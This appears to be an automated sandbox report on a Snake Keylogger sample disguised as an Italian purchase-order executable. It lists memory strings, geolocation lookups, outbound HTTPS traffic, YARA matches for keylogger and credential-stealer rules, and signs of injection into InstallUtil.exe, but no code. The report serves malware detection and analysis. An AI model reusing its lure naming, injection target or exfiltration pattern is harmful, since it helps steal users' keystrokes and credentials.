Source: InstallUtil.exe, 00000003.00000002.4589297423.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002775000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002767000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002748000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: InstallUtil.exe, 00000003.00000002.4589297423.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002775000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002767000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002748000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49962 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 3.2.InstallUtil.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.InstallUtil.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.InstallUtil.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.InstallUtil.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: InstallUtil.exe PID: 2676, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 2676, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_05CB8D40 NtResumeThread,	0_2_05CB8D40
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_05CB51E8 NtProtectVirtualMemory,	0_2_05CB51E8
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_05CB8D39 NtResumeThread,	0_2_05CB8D39
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_05CB51E0 NtProtectVirtualMemory,	0_2_05CB51E0

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_0122E410	0_2_0122E410
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_0122A528	0_2_0122A528
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_0122A51E	0_2_0122A51E
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_0122AAB8	0_2_0122AAB8
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_05CB1CE8	0_2_05CB1CE8
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_05CB6B80	0_2_05CB6B80
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_05CB1CD8	0_2_05CB1CD8
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_0758F718	0_2_0758F718
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_0758F450	0_2_0758F450
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_0758E3B0	0_2_0758E3B0
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_0758DE78	0_2_0758DE78
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_07570040	0_2_07570040
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_07570006	0_2_07570006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2F017	3_2_00B2F017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2612F	3_2_00B2612F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2B338	3_2_00B2B338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2C457	3_2_00B2C457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B246D9	3_2_00B246D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2B7E2	3_2_00B2B7E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2C761	3_2_00B2C761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B26748	3_2_00B26748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2BAC0	3_2_00B2BAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2CA41	3_2_00B2CA41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2BDA0	3_2_00B2BDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2C480	3_2_00B2C480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2E537	3_2_00B2E537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2E538	3_2_00B2E538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B23570	3_2_00B23570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F211C0	3_2_05F211C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F27D90	3_2_05F27D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F23870	3_2_05F23870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F28460	3_2_05F28460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F20040	3_2_05F20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2C1F0	3_2_05F2C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2C1E0	3_2_05F2C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F211B0	3_2_05F211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2F1B8	3_2_05F2F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2F1A9	3_2_05F2F1A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2BD98	3_2_05F2BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2BD88	3_2_05F2BD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F27D8F	3_2_05F27D8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F20D60	3_2_05F20D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2ED60	3_2_05F2ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2ED50	3_2_05F2ED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F20D51	3_2_05F20D51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2B940	3_2_05F2B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2B930	3_2_05F2B930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F20900	3_2_05F20900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2E907	3_2_05F2E907
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2E908	3_2_05F2E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F208FF	3_2_05F208FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2B4E7	3_2_05F2B4E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2B4E8	3_2_05F2B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2E4B0	3_2_05F2E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F204A0	3_2_05F204A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2E4A0	3_2_05F2E4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F20490	3_2_05F20490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2386F	3_2_05F2386F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2E058	3_2_05F2E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2E049	3_2_05F2E049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2DC00	3_2_05F2DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F20006	3_2_05F20006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2DBF1	3_2_05F2DBF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F273E7	3_2_05F273E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F273E8	3_2_05F273E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2D7A8	3_2_05F2D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2D798	3_2_05F2D798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2D350	3_2_05F2D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2D340	3_2_05F2D340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2CEF8	3_2_05F2CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2CEE9	3_2_05F2CEE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2CAA0	3_2_05F2CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2CA9F	3_2_05F2CA9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2FA68	3_2_05F2FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2FA59	3_2_05F2FA59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2C648	3_2_05F2C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2C638	3_2_05F2C638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2F610	3_2_05F2F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F2F600	3_2_05F2F600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F591E0	3_2_05F591E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F511A0	3_2_05F511A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5B160	3_2_05F5B160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F57910	3_2_05F57910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5A4C0	3_2_05F5A4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5C448	3_2_05F5C448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F59830	3_2_05F59830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5B7B0	3_2_05F5B7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5DF55	3_2_05F5DF55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5AB10	3_2_05F5AB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F57EFE	3_2_05F57EFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F59E78	3_2_05F59E78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5BE00	3_2_05F5BE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5BDFB	3_2_05F5BDFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F591CF	3_2_05F591CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F55DA0	3_2_05F55DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F51191	3_2_05F51191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F55D9F	3_2_05F55D9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5B150	3_2_05F5B150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F55947	3_2_05F55947
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F55948	3_2_05F55948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F50D48	3_2_05F50D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F50D39	3_2_05F50D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F57900	3_2_05F57900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F52900	3_2_05F52900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F508F0	3_2_05F508F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F554F0	3_2_05F554F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F554E1	3_2_05F554E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F508E0	3_2_05F508E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5A4BF	3_2_05F5A4BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F574B8	3_2_05F574B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F574A8	3_2_05F574A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F50497	3_2_05F50497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F55098	3_2_05F55098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F50498	3_2_05F50498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5508A	3_2_05F5508A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F57060	3_2_05F57060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F57054	3_2_05F57054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F54C40	3_2_05F54C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F50040	3_2_05F50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F54C30	3_2_05F54C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5C438	3_2_05F5C438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F59820	3_2_05F59820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F50006	3_2_05F50006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F56C08	3_2_05F56C08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F56BF8	3_2_05F56BF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F547E8	3_2_05F547E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F547DA	3_2_05F547DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F567B0	3_2_05F567B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5B7A0	3_2_05F5B7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F567AF	3_2_05F567AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F54368	3_2_05F54368
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F57F58	3_2_05F57F58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F54358	3_2_05F54358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F5AB0F	3_2_05F5AB0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F59E77	3_2_05F59E77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F56220	3_2_05F56220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F56210	3_2_05F56210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F53600	3_2_05F53600

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.000000000332D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2418456888.0000000006860000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRnyawetebz.dll" vs Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
